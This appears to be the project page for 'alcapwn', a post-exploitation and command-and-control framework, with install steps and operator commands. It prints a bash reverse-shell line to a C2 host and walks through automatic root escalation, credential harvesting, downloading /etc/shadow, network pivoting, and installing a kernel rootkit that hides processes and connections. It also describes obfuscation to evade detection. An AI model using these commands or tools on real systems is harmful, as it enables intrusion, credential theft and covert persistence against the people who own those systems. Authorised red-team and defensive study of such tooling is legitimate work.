alcapwn — post-exploitation framework

getting started

Install

Pre-built binaries for Linux and macOS (amd64 / arm64) are attached to every GitHub release with SHA-256 checksums. No runtime dependencies.

one-liner (latest release)

# linux/amd64
$ curl -sL https://github.com/exec/alcapwn/releases/\
latest/download/alcapwn-linux-amd64.tar.gz \
  | tar xz && sudo mv alcapwn /usr/local/bin/

build from source

$ git clone https://github.com/exec/alcapwn
$ cd alcapwn
$ go build -o alcapwn .

operator modes

$ ./alcapwn -l 0.0.0.0:4444            # TCP listener
$ ./alcapwn -l 0.0.0.0:4444 --tls       # ephemeral TLS
$ ./alcapwn -l 0.0.0.0:4444 -r          # auto-recon on connect
alcapwn> listen http 0.0.0.0:8443 --tls  # HTTPS beacon listener

capabilities

What it does

alcapwn is a post-exploitation framework that handles the full lifecycle: catch shells, deploy encrypted agents, recon targets, escalate privileges, pivot through networks, and persist access — all from one operator console managing up to 1024 sessions.

Encrypted C2 agent

Cross-compiled Go agent with X25519 key exchange and AES-256-GCM per-session encryption. TCP and HTTP transports with jitter, certificate pinning, and XOR config obfuscation.

Automatic recon

HMAC-authenticated bash recon script discovers SUID/SGID binaries, sudo rules, capabilities, cron jobs, Docker sockets, credentials, and CVEs. Parsed into structured findings in seconds.

Auto privilege escalation

75-entry exploit dataset covering GTFOBins, sudo, capabilities, cron, CVEs (Baron Samedit, PwnKit, DIRTYFRAG-2026), Docker, and Windows privesc. Exploits with embedded binaries are delivered over the PTY — no gcc required on target. exploit auto walks candidates until root.

Network pivoting

SOCKS5 proxy and TCP port forwarding through any session. Scan internal networks from the agent. Works with proxychains.

Persistence

One-command persistence via cron, bashrc, SSH key, systemd, setuid, or kernel LKM rootkit (persist 1 rootkat — uploads, insmod, systemd boot persistence, auto-hides process and connection via rootkat). Registry/scheduled task on Windows. Reconnecting sessions auto-label by IP.

Credential harvesting

Agent-side harvest of SSH keys, shell history, .env files, AWS credentials, git configs (Linux) and PowerShell history, env, SSH (Windows). Streamed back encrypted.

Cross-platform agents

generate linux amd64 cross-compiles agents for 6 targets (Linux amd64/arm64/armv7/i386, macOS x86_64/aarch64). Built-in minishell fallback when no system shell is available.

Operator security

Terminal injection defense (C1 codes, OSC 52, APC/DCS stripping), per-listener IP firewalls with CIDR, and ANSI-safe output for all remote data.

workflow

Two paths to the same console

reverse shell (PTY)

# target runs:
$ bash -i >& /dev/tcp/c2/4444 0>&1

# alcapwn auto-upgrades to PTY
# [+] Session 1 ready

generated agent (encrypted)

alcapwn> generate linux amd64 \
  --lhost 10.0.0.1 --obfuscate

# deploy agent-linux-amd64 to target
# [+] Agent 1 ready (AES-256-GCM)

# Both session types share the same operator commands:

alcapwn> recon 1               # structured recon (or -r at startup)
alcapwn> exploit auto 1        # walk all privesc candidates
# [+] ROOT via suid_python3 (euid=0)

alcapwn> creds 1              # harvest credentials
alcapwn> scan 1 10.0.0.0/24   # scan internal network from target
alcapwn> pivot 1 --socks5 1080 # SOCKS5 proxy through session
alcapwn> persist 1 rootkat     # LKM rootkit — upload, insmod, boot-persist, hide
alcapwn> use 1                # interactive shell (Ctrl+D to background)
alcapwn> download 1 /etc/shadow
alcapwn> export 1 --format json findings.json

status

Shipped and what's next

Agent

Cross-platform C2 agent with encrypted transport

Go agent for 6 targets. X25519 + AES-256-GCM. TCP and HTTP/S transports with jitter, cert pinning, reconnect.
Crypto

End-to-end encrypted channels

ECDH key exchange, HKDF-SHA256 key derivation, per-direction AES-256-GCM with AAD binding and NIST nonce limits.
Callbacks

HTTP/S beacon infrastructure

HTTP listener with custom registration/beacon paths, TLS, browser-like headers, configurable intervals and jitter.
Pivoting

SOCKS5 proxy and TCP forwarding

Route traffic through sessions to reach internal networks. Agent-side port scanning with concurrent TCP connect.
Obfuscation

XOR config encoding and stripped builds

C2 address hidden from strings(1). Builds stripped with -s -w. Custom User-Agent and URI paths for traffic blending.
Post-Exploit

Credential harvesting (Linux + Windows)

SSH keys, shell history, .env files, AWS creds, git configs, PowerShell history. Agent-side harvest, encrypted exfil.
Recon

Automated recon + 75-entry exploit database

HMAC-authenticated script, structured parser, GTFOBins/CVE matching, auto privilege escalation. Embedded binaries delivered over PTY — no compiler needed on target. Works on PTY and agent sessions.
Persistence

Kernel LKM rootkit persistence

Integrates with rootkat: uploads a pre-built .ko over PTY base64, insmod, systemd boot unit, then auto-hides the shell PID and reverse-shell connection via ftrace magic-signal control surface. Supports Linux 6.8+ (Ubuntu 24.04 LTS through 26.04); alcapwn auto-fetches the matching build from exec/rootkat releases.
Modules

Plugin module system planned

Loadable server/agent modules for keylogging, screenshots, clipboard access. Agent modules compiled in at generate time.
Staging

Multi-stage payload delivery planned

Stage0 dropper to stage1 loader to stage2 full agent, with integrity verification between stages.
Profiles

Malleable C2 profiles planned

Customize traffic patterns, endpoints, headers, and timing to mimic legitimate services.
Windows

Windows operator console

Platform abstractions for stdin polling and signal handling. Agent sessions already work; PTY sessions need stubs.